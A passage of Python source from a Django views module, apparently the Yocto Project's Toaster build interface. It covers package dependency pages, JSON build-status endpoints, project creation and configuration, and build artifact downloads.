INVALID_KEY :\n if Target_Installed_Package.objects.filter(target_id__exact = target_id, package_id__exact = dep_package.id).count() > 0:\n installed = True\n dep = {\n 'name' : dep_package.name,\n 'version' : version,\n 'size' : dep_package.size,\n 'dep_type' : idep.dep_type,\n 'dep_type_display' : dep_entry[0].capitalize(),\n 'dep_type_help' : dep_entry[1] % (dep_package.name, package.name),\n 'depends_on_id' : dep_package.id,\n 'installed' : installed,\n }\n\n if target_id != INVALID_KEY:\n dep['alias'] = _get_package_alias(dep_package)\n\n if idep.dep_type == rdepends_type :\n runtime_deps.append(dep)\n elif idep.dep_type in other_depends_types :\n other_deps.append(dep)\n\n rdep_sorted = sorted(runtime_deps, key=lambda k: k['name'])\n odep_sorted = sorted(\n sorted(other_deps, key=lambda k: k['name']),\n key=lambda k: k['dep_type'])\n retvalues = {'runtime_deps' : rdep_sorted, 'other_deps' : odep_sorted}\n return retvalues\n\n# Return the count of packages dependent on package for this target_id image\ndef _get_package_reverse_dep_count(package, target_id):\n return package.package_dependencies_target.filter(target_id__exact=target_id, dep_type__exact = Package_Dependency.TYPE_TRDEPENDS).count()\n\n# Return the count of the packages that this package_id is dependent on.\n# Use one of the two RDEPENDS types, either TRDEPENDS if the package was\n# installed, or else RDEPENDS if only built.\ndef _get_package_dependency_count(package, target_id, is_installed):\n if is_installed :\n return package.package_dependencies_source.filter(target_id__exact = target_id,\n dep_type__exact = Package_Dependency.TYPE_TRDEPENDS).count()\n else :\n return package.package_dependencies_source.filter(dep_type__exact = Package_Dependency.TYPE_RDEPENDS).count()\n\ndef _get_package_alias(package):\n alias = package.installed_name\n if alias is not None and alias != '' and alias != package.name:\n return alias\n else:\n return ''\n\ndef _get_fullpackagespec(package):\n r = package.name\n version_good = package.version is not None and package.version != ''\n revision_good = package.revision is not None and package.revision != ''\n if version_good or revision_good:\n r += '_'\n if version_good:\n r += package.version\n if revision_good:\n r += '-'\n if revision_good:\n r += package.revision\n return r\n\ndef package_built_detail(request, build_id, package_id):\n template = \"package_built_detail.html\"\n if Build.objects.filter(pk=build_id).count() == 0 :\n return redirect(builds)\n\n # follow convention for pagination w/ search although not used for this view\n queryset = Package_File.objects.filter(package_id__exact=package_id)\n (pagesize, orderby) = _get_parameters_values(request, 25, 'path:+')\n mandatory_parameters = { 'count': pagesize, 'page' : 1, 'orderby' : orderby }\n retval = _verify_parameters( request.GET, mandatory_parameters )\n if retval:\n return _redirect_parameters( 'package_built_detail', request.GET, mandatory_parameters, build_id = build_id, package_id = package_id)\n\n (filter_string, search_term, ordering_string) = _search_tuple(request, Package_File)\n paths = _get_queryset(Package_File, queryset, filter_string, search_term, ordering_string, 'path')\n\n package = Package.objects.get(pk=package_id)\n package.fullpackagespec = _get_fullpackagespec(package)\n context = {\n 'build' : Build.objects.get(pk=build_id),\n 'package' : package,\n 'dependency_count' : _get_package_dependency_count(package, -1, False),\n 'objects' : paths,\n 'tablecols':[\n {\n 'name':'File',\n 'orderfield': _get_toggle_order(request, \"path\"),\n 'ordericon':_get_toggle_order_icon(request, \"path\"),\n },\n {\n 'name':'Size',\n 'orderfield': _get_toggle_order(request, \"size\", True),\n 'ordericon':_get_toggle_order_icon(request, \"size\"),\n 'dclass': 'sizecol span2',\n },\n ]\n }\n if paths.all().count() < 2:\n context['disable_sort'] = True;\n\n response = toaster_render(request, template, context)\n _set_parameters_values(pagesize, orderby, request)\n return response\n\ndef package_built_dependencies(request, build_id, package_id):\n template = \"package_built_dependencies.html\"\n if Build.objects.filter(pk=build_id).count() == 0 :\n return redirect(builds)\n\n package = Package.objects.get(pk=package_id)\n package.fullpackagespec = _get_fullpackagespec(package)\n dependencies = _get_package_dependencies(package_id)\n context = {\n 'build' : Build.objects.get(pk=build_id),\n 'package' : package,\n 'runtime_deps' : dependencies['runtime_deps'],\n 'other_deps' : dependencies['other_deps'],\n 'dependency_count' : _get_package_dependency_count(package, -1, False)\n }\n return toaster_render(request, template, context)\n\n\ndef package_included_detail(request, build_id, target_id, package_id):\n template = \"package_included_detail.html\"\n if Build.objects.filter(pk=build_id).count() == 0 :\n return redirect(builds)\n\n # follow convention for pagination w/ search although not used for this view\n (pagesize, orderby) = _get_parameters_values(request, 25, 'path:+')\n mandatory_parameters = { 'count': pagesize, 'page' : 1, 'orderby' : orderby }\n retval = _verify_parameters( request.GET, mandatory_parameters )\n if retval:\n return _redirect_parameters( 'package_included_detail', request.GET, mandatory_parameters, build_id = build_id, target_id = target_id, package_id = package_id)\n (filter_string, search_term, ordering_string) = _search_tuple(request, Package_File)\n\n queryset = Package_File.objects.filter(package_id__exact=package_id)\n paths = _get_queryset(Package_File, queryset, filter_string, search_term, ordering_string, 'path')\n\n package = Package.objects.get(pk=package_id)\n package.fullpackagespec = _get_fullpackagespec(package)\n package.alias = _get_package_alias(package)\n target = Target.objects.get(pk=target_id)\n context = {\n 'build' : Build.objects.get(pk=build_id),\n 'target' : target,\n 'package' : package,\n 'reverse_count' : _get_package_reverse_dep_count(package, target_id),\n 'dependency_count' : _get_package_dependency_count(package, target_id, True),\n 'objects': paths,\n 'tablecols':[\n {\n 'name':'File',\n 'orderfield': _get_toggle_order(request, \"path\"),\n 'ordericon':_get_toggle_order_icon(request, \"path\"),\n },\n {\n 'name':'Size',\n 'orderfield': _get_toggle_order(request, \"size\", True),\n 'ordericon':_get_toggle_order_icon(request, \"size\"),\n 'dclass': 'sizecol span2',\n },\n ]\n }\n if paths.all().count() < 2:\n context['disable_sort'] = True\n response = toaster_render(request, template, context)\n _set_parameters_values(pagesize, orderby, request)\n return response\n\ndef package_included_dependencies(request, build_id, target_id, package_id):\n template = \"package_included_dependencies.html\"\n if Build.objects.filter(pk=build_id).count() == 0 :\n return redirect(builds)\n\n package = Package.objects.get(pk=package_id)\n package.fullpackagespec = _get_fullpackagespec(package)\n package.alias = _get_package_alias(package)\n target = Target.objects.get(pk=target_id)\n\n dependencies = _get_package_dependencies(package_id, target_id)\n context = {\n 'build' : Build.objects.get(pk=build_id),\n 'package' : package,\n 'target' : target,\n 'runtime_deps' : dependencies['runtime_deps'],\n 'other_deps' : dependencies['other_deps'],\n 'reverse_count' : _get_package_reverse_dep_count(package, target_id),\n 'dependency_count' : _get_package_dependency_count(package, target_id, True)\n }\n return toaster_render(request, template, context)\n\ndef package_included_reverse_dependencies(request, build_id, target_id, package_id):\n template = \"package_included_reverse_dependencies.html\"\n if Build.objects.filter(pk=build_id).count() == 0 :\n return redirect(builds)\n\n (pagesize, orderby) = _get_parameters_values(request, 25, 'package__name:+')\n mandatory_parameters = { 'count': pagesize, 'page' : 1, 'orderby': orderby }\n retval = _verify_parameters( request.GET, mandatory_parameters )\n if retval:\n return _redirect_parameters( 'package_included_reverse_dependencies', request.GET, mandatory_parameters, build_id = build_id, target_id = target_id, package_id = package_id)\n (filter_string, search_term, ordering_string) = _search_tuple(request, Package_File)\n\n queryset = Package_Dependency.objects.select_related('depends_on').filter(depends_on=package_id, target_id=target_id, dep_type=Package_Dependency.TYPE_TRDEPENDS)\n objects = _get_queryset(Package_Dependency, queryset, filter_string, search_term, ordering_string, 'package__name')\n\n package = Package.objects.get(pk=package_id)\n package.fullpackagespec = _get_fullpackagespec(package)\n package.alias = _get_package_alias(package)\n target = Target.objects.get(pk=target_id)\n for o in objects:\n if o.package.version != '':\n o.package.version += '-' + o.package.revision\n o.alias = _get_package_alias(o.package)\n context = {\n 'build' : Build.objects.get(pk=build_id),\n 'package' : package,\n 'target' : target,\n 'objects' : objects,\n 'reverse_count' : _get_package_reverse_dep_count(package, target_id),\n 'dependency_count' : _get_package_dependency_count(package, target_id, True),\n 'tablecols':[\n {\n 'name':'Package',\n 'orderfield': _get_toggle_order(request, \"package__name\"),\n 'ordericon': _get_toggle_order_icon(request, \"package__name\"),\n },\n {\n 'name':'Version',\n },\n {\n 'name':'Size',\n 'orderfield': _get_toggle_order(request, \"package__size\", True),\n 'ordericon': _get_toggle_order_icon(request, \"package__size\"),\n 'dclass': 'sizecol span2',\n },\n ]\n }\n if objects.all().count() < 2:\n context['disable_sort'] = True\n response = toaster_render(request, template, context)\n _set_parameters_values(pagesize, orderby, request)\n return response\n\ndef image_information_dir(request, build_id, target_id, packagefile_id):\n # stubbed for now\n return redirect(builds)\n # the context processor that supplies data used across all the pages\n\n# a context processor which runs on every request; this provides the\n# projects and non_cli_projects (i.e. projects created by the user)\n# variables referred to in templates, which used to determine the\n# visibility of UI elements like the \"New build\" button\ndef managedcontextprocessor(request):\n projects = Project.objects.all()\n ret = {\n \"projects\": projects,\n \"non_cli_projects\": projects.exclude(is_default=True),\n \"DEBUG\" : toastermain.settings.DEBUG,\n \"TOASTER_BRANCH\": toastermain.settings.TOASTER_BRANCH,\n \"TOASTER_REVISION\" : toastermain.settings.TOASTER_REVISION,\n }\n return ret\n\n# REST-based API calls to return build/building status to external Toaster\n# managers and aggregators via JSON\n\ndef _json_build_status(build_id,extend):\n build_stat = None\n try:\n build = Build.objects.get( pk = build_id )\n build_stat = {}\n build_stat['id'] = build.id\n build_stat['name'] = build.build_name\n build_stat['machine'] = build.machine\n build_stat['distro'] = build.distro\n build_stat['start'] = build.started_on\n # look up target name\n target= Target.objects.get( build = build )\n if target:\n if target.task:\n build_stat['target'] = '%s:%s' % (target.target,target.task)\n else:\n build_stat['target'] = '%s' % (target.target)\n else:\n build_stat['target'] = ''\n # look up project name\n project = Project.objects.get( build = build )\n if project:\n build_stat['project'] = project.name\n else:\n build_stat['project'] = ''\n if Build.IN_PROGRESS == build.outcome:\n now = timezone.now()\n timediff = now - build.started_on\n build_stat['seconds']='%.3f' % timediff.total_seconds()\n build_stat['clone']='%d:%d' % (build.repos_cloned,build.repos_to_clone)\n build_stat['parse']='%d:%d' % (build.recipes_parsed,build.recipes_to_parse)\n tf = Task.objects.filter(build = build)\n tfc = tf.count()\n if tfc > 0:\n tfd = tf.exclude(order__isnull=True).count()\n else:\n tfd = 0\n build_stat['task']='%d:%d' % (tfd,tfc)\n else:\n build_stat['outcome'] = build.get_outcome_text()\n timediff = build.completed_on - build.started_on\n build_stat['seconds']='%.3f' % timediff.total_seconds()\n build_stat['stop'] = build.completed_on\n messages = LogMessage.objects.all().filter(build = build)\n errors = len(messages.filter(level=LogMessage.ERROR) |\n messages.filter(level=LogMessage.EXCEPTION) |\n messages.filter(level=LogMessage.CRITICAL))\n build_stat['errors'] = errors\n warnings = len(messages.filter(level=LogMessage.WARNING))\n build_stat['warnings'] = warnings\n if extend:\n build_stat['cooker_log'] = build.cooker_log_path\n except Exception as e:\n build_state = str(e)\n return build_stat\n\ndef json_builds(request):\n build_table = []\n builds = []\n try:\n builds = Build.objects.exclude(outcome=Build.IN_PROGRESS).order_by(\"-started_on\")\n for build in builds:\n build_table.append(_json_build_status(build.id,False))\n except Exception as e:\n build_table = str(e)\n return JsonResponse({'builds' : build_table, 'count' : len(builds)})\n\ndef json_building(request):\n build_table = []\n builds = []\n try:\n builds = Build.objects.filter(outcome=Build.IN_PROGRESS).order_by(\"-started_on\")\n for build in builds:\n build_table.append(_json_build_status(build.id,False))\n except Exception as e:\n build_table = str(e)\n return JsonResponse({'building' : build_table, 'count' : len(builds)})\n\ndef json_build(request,build_id):\n return JsonResponse({'build' : _json_build_status(build_id,True)})\n\n\nimport toastermain.settings\n\nfrom orm.models import Project, ProjectLayer, ProjectVariable\nfrom bldcontrol.models import BuildEnvironment\n\n# we have a set of functions if we're in managed mode, or\n# a default \"page not available\" simple functions for interactive mode\n\nif True:\n from django.contrib.auth.models import User\n from django.contrib.auth import authenticate, login\n\n from orm.models import LayerSource, ToasterSetting, Release\n\n import traceback\n\n class BadParameterException(Exception):\n ''' The exception raised on invalid POST requests '''\n pass\n\n # new project\n def newproject(request):\n if not project_enable:\n return redirect( landing )\n\n template = \"newproject.html\"\n context = {\n 'email': request.user.email if request.user.is_authenticated else '',\n 'username': request.user.username if request.user.is_authenticated else '',\n 'releases': Release.objects.order_by(\"description\"),\n }\n\n try:\n context['defaultbranch'] = ToasterSetting.objects.get(name = \"DEFAULT_RELEASE\").value\n except ToasterSetting.DoesNotExist:\n pass\n\n if request.method == \"GET\":\n # render new project page\n return toaster_render(request, template, context)\n elif request.method == \"POST\":\n mandatory_fields = ['projectname', 'ptype']\n try:\n ptype = request.POST.get('ptype')\n if ptype == \"import\":\n mandatory_fields.append('importdir')\n else:\n mandatory_fields.append('projectversion')\n # make sure we have values for all mandatory_fields\n missing = [field for field in mandatory_fields if len(request.POST.get(field, '')) == 0]\n if missing:\n # set alert for missing fields\n raise BadParameterException(\"Fields missing: %s\" % \", \".join(missing))\n\n if not request.user.is_authenticated:\n user = authenticate(username = request.POST.get('username', '_anonuser'), password = 'nopass')\n if user is None:\n user = User.objects.create_user(username = request.POST.get('username', '_anonuser'), email = request.POST.get('email', ''), password = \"nopass\")\n\n user = authenticate(username = user.username, password = 'nopass')\n login(request, user)\n\n # save the project\n if ptype == \"import\":\n if not os.path.isdir('%s/conf' % request.POST['importdir']):\n raise BadParameterException(\"Bad path or missing 'conf' directory (%s)\" % request.POST['importdir'])\n from django.core import management\n management.call_command('buildimport', '--command=import', '--name=%s' % request.POST['projectname'], '--path=%s' % request.POST['importdir'])\n prj = Project.objects.get(name = request.POST['projectname'])\n prj.merged_attr = True\n prj.save()\n else:\n release = Release.objects.get(pk = request.POST.get('projectversion', None ))\n prj = Project.objects.create_project(name = request.POST['projectname'], release = release)\n prj.user_id = request.user.pk\n if 'mergeattr' == request.POST.get('mergeattr', ''):\n prj.merged_attr = True\n prj.save()\n\n return redirect(reverse(project, args=(prj.pk,)) + \"?notify=new-project\")\n\n except (IntegrityError, BadParameterException) as e:\n # fill in page with previously submitted values\n for field in mandatory_fields:\n context.__setitem__(field, request.POST.get(field, \"-- missing\"))\n if isinstance(e, IntegrityError) and \"username\" in str(e):\n context['alert'] = \"Your chosen username is already used\"\n else:\n context['alert'] = str(e)\n return toaster_render(request, template, context)\n\n raise Exception(\"Invalid HTTP method for this page\")\n\n # new project\n def newproject_specific(request, pid):\n if not project_enable:\n return redirect( landing )\n\n project = Project.objects.get(pk=pid)\n template = \"newproject_specific.html\"\n context = {\n 'email': request.user.email if request.user.is_authenticated else '',\n 'username': request.user.username if request.user.is_authenticated else '',\n 'releases': Release.objects.order_by(\"description\"),\n 'projectname': project.name,\n 'project_pk': project.pk,\n }\n\n # WORKAROUND: if we already know release, redirect 'newproject_specific' to 'project_specific'\n if '1' == project.get_variable('INTERNAL_PROJECT_SPECIFIC_SKIPRELEASE'):\n return redirect(reverse(project_specific, args=(project.pk,)))\n\n try:\n context['defaultbranch'] = ToasterSetting.objects.get(name = \"DEFAULT_RELEASE\").value\n except ToasterSetting.DoesNotExist:\n pass\n\n if request.method == \"GET\":\n # render new project page\n return toaster_render(request, template, context)\n elif request.method == \"POST\":\n mandatory_fields = ['projectname', 'ptype']\n try:\n ptype = request.POST.get('ptype')\n if ptype == \"build\":\n mandatory_fields.append('projectversion')\n # make sure we have values for all mandatory_fields\n missing = [field for field in mandatory_fields if len(request.POST.get(field, '')) == 0]\n if missing:\n # set alert for missing fields\n raise BadParameterException(\"Fields missing: %s\" % \", \".join(missing))\n\n if not request.user.is_authenticated:\n user = authenticate(username = request.POST.get('username', '_anonuser'), password = 'nopass')\n if user is None:\n user = User.objects.create_user(username = request.POST.get('username', '_anonuser'), email = request.POST.get('email', ''), password = \"nopass\")\n\n user = authenticate(username = user.username, password = 'nopass')\n login(request, user)\n\n # save the project\n if ptype == \"analysis\":\n release = None\n else:\n release = Release.objects.get(pk = request.POST.get('projectversion', None ))\n\n prj = Project.objects.create_project(name = request.POST['projectname'], release = release, existing_project = project)\n prj.user_id = request.user.pk\n prj.save()\n return redirect(reverse(project_specific, args=(prj.pk,)) + \"?notify=new-project\")\n\n except (IntegrityError, BadParameterException) as e:\n # fill in page with previously submitted values\n for field in mandatory_fields:\n context.__setitem__(field, request.POST.get(field, \"-- missing\"))\n if isinstance(e, IntegrityError) and \"username\" in str(e):\n context['alert'] = \"Your chosen username is already used\"\n else:\n context['alert'] = str(e)\n return toaster_render(request, template, context)\n\n raise Exception(\"Invalid HTTP method for this page\")\n\n # Shows the edit project page\n def project(request, pid):\n project = Project.objects.get(pk=pid)\n\n if '1' == os.environ.get('TOASTER_PROJECTSPECIFIC'):\n if request.GET:\n #Example:request.GET=\n params = urlencode(request.GET).replace('%5B%27','').replace('%27%5D','')\n return redirect(\"%s?%s\" % (reverse(project_specific, args=(project.pk,)),params))\n else:\n return redirect(reverse(project_specific, args=(project.pk,)))\n context = {\"project\": project}\n return toaster_render(request, \"project.html\", context)\n\n # Shows the edit project-specific page\n def project_specific(request, pid):\n project = Project.objects.get(pk=pid)\n\n # Are we refreshing from a successful project specific update clone?\n if Project.PROJECT_SPECIFIC_CLONING_SUCCESS == project.get_variable(Project.PROJECT_SPECIFIC_STATUS):\n return redirect(reverse(landing_specific,args=(project.pk,)))\n\n context = {\n \"project\": project,\n \"is_new\" : project.get_variable(Project.PROJECT_SPECIFIC_ISNEW),\n \"default_image_recipe\" : project.get_variable(Project.PROJECT_SPECIFIC_DEFAULTIMAGE),\n \"mru\" : Build.objects.all().filter(project=project,outcome=Build.IN_PROGRESS),\n }\n if project.build_set.filter(outcome=Build.IN_PROGRESS).count() > 0:\n context['build_in_progress_none_completed'] = True\n else:\n context['build_in_progress_none_completed'] = False\n return toaster_render(request, \"project.html\", context)\n\n # perform the final actions for the project specific page\n def project_specific_finalize(cmnd, pid):\n project = Project.objects.get(pk=pid)\n callback = project.get_variable(Project.PROJECT_SPECIFIC_CALLBACK)\n if \"update\" == cmnd:\n # Delete all '_PROJECT_PREPARE_' builds\n for b in Build.objects.all().filter(project=project):\n delete_build = False\n for t in b.target_set.all():\n if '_PROJECT_PREPARE_' == t.target:\n delete_build = True\n if delete_build:\n from django.core import management\n management.call_command('builddelete', str(b.id), interactive=False)\n # perform callback at this last moment if defined, in case Toaster gets shutdown next\n default_target = project.get_variable(Project.PROJECT_SPECIFIC_DEFAULTIMAGE)\n if callback:\n callback = callback.replace(\"\",default_target)\n if \"cancel\" == cmnd:\n if callback:\n callback = callback.replace(\"\",\"none\")\n callback = callback.replace(\"--update\",\"--cancel\")\n # perform callback at this last moment if defined, in case this Toaster gets shutdown next\n ret = ''\n if callback:\n ret = os.system('bash -c \"%s\"' % callback)\n project.set_variable(Project.PROJECT_SPECIFIC_CALLBACK,'')\n # Delete the temp project specific variables\n project.set_variable(Project.PROJECT_SPECIFIC_ISNEW,'')\n project.set_variable(Project.PROJECT_SPECIFIC_STATUS,Project.PROJECT_SPECIFIC_NONE)\n # WORKAROUND: Release this workaround flag\n project.set_variable('INTERNAL_PROJECT_SPECIFIC_SKIPRELEASE','')\n\n # Shows the final landing page for project specific update\n def landing_specific(request, pid):\n project_specific_finalize(\"update\", pid)\n context = {\n \"install_dir\": os.environ['TOASTER_DIR'],\n }\n return toaster_render(request, \"landing_specific.html\", context)\n\n # Shows the related landing-specific page\n def landing_specific_cancel(request, pid):\n project_specific_finalize(\"cancel\", pid)\n context = {\n \"install_dir\": os.environ['TOASTER_DIR'],\n \"status\": \"cancel\",\n }\n return toaster_render(request, \"landing_specific.html\", context)\n\n def jsunittests(request):\n \"\"\" Provides a page for the js unit tests \"\"\"\n bbv = BitbakeVersion.objects.filter(branch=\"master\").first()\n release = Release.objects.filter(bitbake_version=bbv).first()\n\n name = \"_js_unit_test_prj_\"\n\n # If there is an existing project by this name delete it.\n # We don't want Lots of duplicates cluttering up the projects.\n Project.objects.filter(name=name).delete()\n\n new_project = Project.objects.create_project(name=name,\n release=release)\n # Add a layer\n layer = new_project.get_all_compatible_layer_versions().first()\n\n ProjectLayer.objects.get_or_create(layercommit=layer,\n project=new_project)\n\n # make sure we have a machine set for this project\n ProjectVariable.objects.get_or_create(project=new_project,\n name=\"MACHINE\",\n value=\"qemux86\")\n context = {'project': new_project}\n return toaster_render(request, \"js-unit-tests.html\", context)\n\n from django.views.decorators.csrf import csrf_exempt\n @csrf_exempt\n @log_view_mixin\n def xhr_testreleasechange(request, pid):\n def response(data):\n return HttpResponse(jsonfilter(data),\n content_type=\"application/json\")\n\n \"\"\" returns layer versions that would be deleted on the new\n release__pk \"\"\"\n try:\n prj = Project.objects.get(pk = pid)\n new_release_id = request.GET['new_release_id']\n\n # If we're already on this project do nothing\n if prj.release.pk == int(new_release_id):\n return reponse({\"error\": \"ok\", \"rows\": []})\n\n retval = []\n\n for project in prj.projectlayer_set.all():\n release = Release.objects.get(pk = new_release_id)\n\n layer_versions = prj.get_all_compatible_layer_versions()\n layer_versions = layer_versions.filter(release = release)\n layer_versions = layer_versions.filter(layer__name = project.layercommit.layer.name)\n\n # there is no layer_version with the new release id,\n # and the same name\n if layer_versions.count() < 1:\n retval.append(project)\n\n return response({\"error\":\"ok\",\n \"rows\": [_lv_to_dict(prj) for y in [x.layercommit for x in retval]]\n })\n\n except Exception as e:\n return response({\"error\": str(e) })\n\n @log_view_mixin\n def xhr_configvaredit(request, pid):\n try:\n prj = Project.objects.get(id = pid)\n # There are cases where user can add variables which hold values\n # like http://, file:/// etc. In such case a simple split(\":\")\n # would fail. One example is SSTATE_MIRRORS variable. So we use\n # max_split var to handle them.\n max_split = 1\n # add conf variables\n if 'configvarAdd' in request.POST:\n t=request.POST['configvarAdd'].strip()\n if \":\" in t:\n variable, value = t.split(\":\", max_split)\n else:\n variable = t\n value = \"\"\n\n pt, created = ProjectVariable.objects.get_or_create(project = prj, name = variable, value = value)\n # change conf variables\n if 'configvarChange' in request.POST:\n t=request.POST['configvarChange'].strip()\n if \":\" in t:\n variable, value = t.split(\":\", max_split)\n else:\n variable = t\n value = \"\"\n\n pt, created = ProjectVariable.objects.get_or_create(project = prj, name = variable)\n pt.value=value\n pt.save()\n # remove conf variables\n if 'configvarDel' in request.POST:\n t=request.POST['configvarDel'].strip()\n pt = ProjectVariable.objects.get(pk = int(t)).delete()\n\n # return all project settings, filter out disallowed and elsewhere-managed variables\n vars_managed,vars_fstypes,vars_disallowed = get_project_configvars_context()\n configvars_query = ProjectVariable.objects.filter(project_id = pid).all()\n for var in vars_managed:\n configvars_query = configvars_query.exclude(name = var)\n for var in vars_disallowed:\n configvars_query = configvars_query.exclude(name = var)\n\n return_data = {\n \"error\": \"ok\",\n 'configvars': [(x.name, x.value, x.pk) for x in configvars_query]\n }\n try:\n return_data['distro'] = ProjectVariable.objects.get(project = prj, name = \"DISTRO\").value,\n except ProjectVariable.DoesNotExist:\n pass\n try:\n return_data['dl_dir'] = ProjectVariable.objects.get(project = prj, name = \"DL_DIR\").value,\n except ProjectVariable.DoesNotExist:\n pass\n try:\n return_data['fstypes'] = ProjectVariable.objects.get(project = prj, name = \"IMAGE_FSTYPES\").value,\n except ProjectVariable.DoesNotExist:\n pass\n try:\n return_data['image_install:append'] = ProjectVariable.objects.get(project = prj, name = \"IMAGE_INSTALL:append\").value,\n except ProjectVariable.DoesNotExist:\n pass\n try:\n return_data['package_classes'] = ProjectVariable.objects.get(project = prj, name = \"PACKAGE_CLASSES\").value,\n except ProjectVariable.DoesNotExist:\n pass\n try:\n return_data['sstate_dir'] = ProjectVariable.objects.get(project = prj, name = \"SSTATE_DIR\").value,\n except ProjectVariable.DoesNotExist:\n pass\n\n return HttpResponse(json.dumps( return_data ), content_type = \"application/json\")\n\n except Exception as e:\n return HttpResponse(json.dumps({\"error\":str(e) + \"\\n\" + traceback.format_exc()}), content_type = \"application/json\")\n\n\n @log_view_mixin\n def customrecipe_download(request, pid, recipe_id):\n recipe = get_object_or_404(CustomImageRecipe, pk=recipe_id)\n\n file_data = recipe.generate_recipe_file_contents()\n\n response = HttpResponse(file_data, content_type='text/plain')\n response['Content-Disposition'] = \\\n 'attachment; filename=\"%s_%s.bb\"' % (recipe.name,\n recipe.version)\n\n return response\n\n def importlayer(request, pid):\n template = \"importlayer.html\"\n context = {\n 'project': Project.objects.get(id=pid),\n }\n return toaster_render(request, template, context)\n\n def layerdetails(request, pid, layerid):\n project = Project.objects.get(pk=pid)\n layer_version = Layer_Version.objects.get(pk=layerid)\n\n project_layers = ProjectLayer.objects.filter(\n project=project).values_list(\"layercommit_id\",\n flat=True)\n\n context = {\n 'project': project,\n 'layer_source': LayerSource.types_dict(),\n 'layerversion': layer_version,\n 'layerdeps': {\n \"list\": [\n {\n \"id\": dep.id,\n \"name\": dep.layer.name,\n \"layerdetailurl\": reverse('layerdetails',\n args=(pid, dep.pk)),\n \"vcs_url\": dep.layer.vcs_url,\n \"vcs_reference\": dep.get_vcs_reference()\n }\n for dep in layer_version.get_alldeps(project.id)]\n },\n 'projectlayers': list(project_layers)\n }\n\n return toaster_render(request, 'layerdetails.html', context)\n\n\n def get_project_configvars_context():\n # Vars managed outside of this view\n vars_managed = {\n 'MACHINE', 'BBLAYERS'\n }\n\n vars_disallowed = {\n 'PARALLEL_MAKE','BB_NUMBER_THREADS',\n 'BB_DISKMON_DIRS','BB_NUMBER_THREADS','CVS_PROXY_HOST','CVS_PROXY_PORT',\n 'PARALLEL_MAKE','TMPDIR',\n 'all_proxy','ftp_proxy','http_proxy ','https_proxy'\n }\n\n vars_fstypes = Target_Image_File.SUFFIXES\n\n return(vars_managed,sorted(vars_fstypes),vars_disallowed)\n\n def projectconf(request, pid):\n\n try:\n prj = Project.objects.get(id = pid)\n except Project.DoesNotExist:\n return HttpResponseNotFound(\"

    Project id \" + pid + \" is unavailable

    \")\n\n # remove disallowed and externally managed varaibles from this list\n vars_managed,vars_fstypes,vars_disallowed = get_project_configvars_context()\n configvars = ProjectVariable.objects.filter(project_id = pid).all()\n for var in vars_managed:\n configvars = configvars.exclude(name = var)\n for var in vars_disallowed:\n configvars = configvars.exclude(name = var)\n\n context = {\n 'project': prj,\n 'configvars': configvars,\n 'vars_managed': vars_managed,\n 'vars_fstypes': vars_fstypes,\n 'vars_disallowed': vars_disallowed,\n }\n\n try:\n context['distro'] = ProjectVariable.objects.get(project = prj, name = \"DISTRO\").value\n context['distro_defined'] = \"1\"\n except ProjectVariable.DoesNotExist:\n pass\n try:\n if ProjectVariable.objects.get(project = prj, name = \"DL_DIR\").value == \"${TOPDIR}/../downloads\":\n be = BuildEnvironment.objects.get(pk = str(1))\n dl_dir = os.path.join(dirname(be.builddir), \"downloads\")\n context['dl_dir'] = dl_dir\n pv, created = ProjectVariable.objects.get_or_create(project = prj, name = \"DL_DIR\")\n pv.value = dl_dir\n pv.save()\n else:\n context['dl_dir'] = ProjectVariable.objects.get(project = prj, name = \"DL_DIR\").value\n context['dl_dir_defined'] = \"1\"\n except (ProjectVariable.DoesNotExist, BuildEnvironment.DoesNotExist):\n pass\n try:\n context['fstypes'] = ProjectVariable.objects.get(project = prj, name = \"IMAGE_FSTYPES\").value\n context['fstypes_defined'] = \"1\"\n except ProjectVariable.DoesNotExist:\n pass\n try:\n context['image_install:append'] = ProjectVariable.objects.get(project = prj, name = \"IMAGE_INSTALL:append\").value\n context['image_install_append_defined'] = \"1\"\n except ProjectVariable.DoesNotExist:\n pass\n try:\n context['package_classes'] = ProjectVariable.objects.get(project = prj, name = \"PACKAGE_CLASSES\").value\n context['package_classes_defined'] = \"1\"\n except ProjectVariable.DoesNotExist:\n pass\n try:\n if ProjectVariable.objects.get(project = prj, name = \"SSTATE_DIR\").value == \"${TOPDIR}/../sstate-cache\":\n be = BuildEnvironment.objects.get(pk = str(1))\n sstate_dir = os.path.join(dirname(be.builddir), \"sstate-cache\")\n context['sstate_dir'] = sstate_dir\n pv, created = ProjectVariable.objects.get_or_create(project = prj, name = \"SSTATE_DIR\")\n pv.value = sstate_dir\n pv.save()\n else:\n context['sstate_dir'] = ProjectVariable.objects.get(project = prj, name = \"SSTATE_DIR\").value\n context['sstate_dir_defined'] = \"1\"\n except (ProjectVariable.DoesNotExist, BuildEnvironment.DoesNotExist):\n pass\n\n return toaster_render(request, \"projectconf.html\", context)\n\n def _file_names_for_artifact(build, artifact_type, artifact_id):\n \"\"\"\n Return a tuple (file path, file name for the download response) for an\n artifact of type artifact_type with ID artifact_id for build; if\n artifact type is not supported, returns (None, None)\n \"\"\"\n file_name = None\n response_file_name = None\n\n if artifact_type == \"cookerlog\":\n file_name = build.cooker_log_path\n response_file_name = \"cooker.log\"\n\n elif artifact_type == \"imagefile\":\n file_name = Target_Image_File.objects.get(target__build = build, pk = artifact_id).file_name\n\n elif artifact_type == \"targetkernelartifact\":\n target = TargetKernelFile.objects.get(pk=artifact_id)\n file_name = target.file_name\n\n elif artifact_type == \"targetsdkartifact\":\n target = TargetSDKFile.objects.get(pk=artifact_id)\n file_name = target.file_name\n\n elif artifact_type == \"licensemanifest\":\n file_name = Target.objects.get(build = build, pk = artifact_id).license_manifest_path\n\n elif artifact_type == \"packagemanifest\":\n file_name = Target.objects.get(build = build, pk = artifact_id).package_manifest_path\n\n elif artifact_type == \"tasklogfile\":\n file_name = Task.objects.get(build = build, pk = artifact_id).logfile\n\n elif artifact_type == \"logmessagefile\":\n file_name = LogMessage.objects.get(build = build, pk = artifact_id).pathname\n\n if file_name and not response_file_name:\n response_file_name = os.path.basename(file_name)\n\n return (file_name, response_file_name)\n\n def build_artifact(request, build_id, artifact_type, artifact_id):\n \"\"\"\n View which returns a build artifact file as a response\n \"\"\"\n file_name = None\n response_file_name = None\n\n try:\n build = Build.objects.get(pk = build_id)\n file_name, response_file_name = _file_names_for_artifact(\n build, artifact_type, artifact_id\n )\n\n if file_name and response_file_name:\n fsock = open(file_name, \"rb\")\n content_type = MimeTypeFinder.get_mimetype(file_name)\n\n response = HttpResponse(fsock, content_type = content_type)\n\n disposition = \"attachment; filename=\" + response_file_name\n response[\"Content-Disposition\"] = disposition\n\n return response\n else:\n return 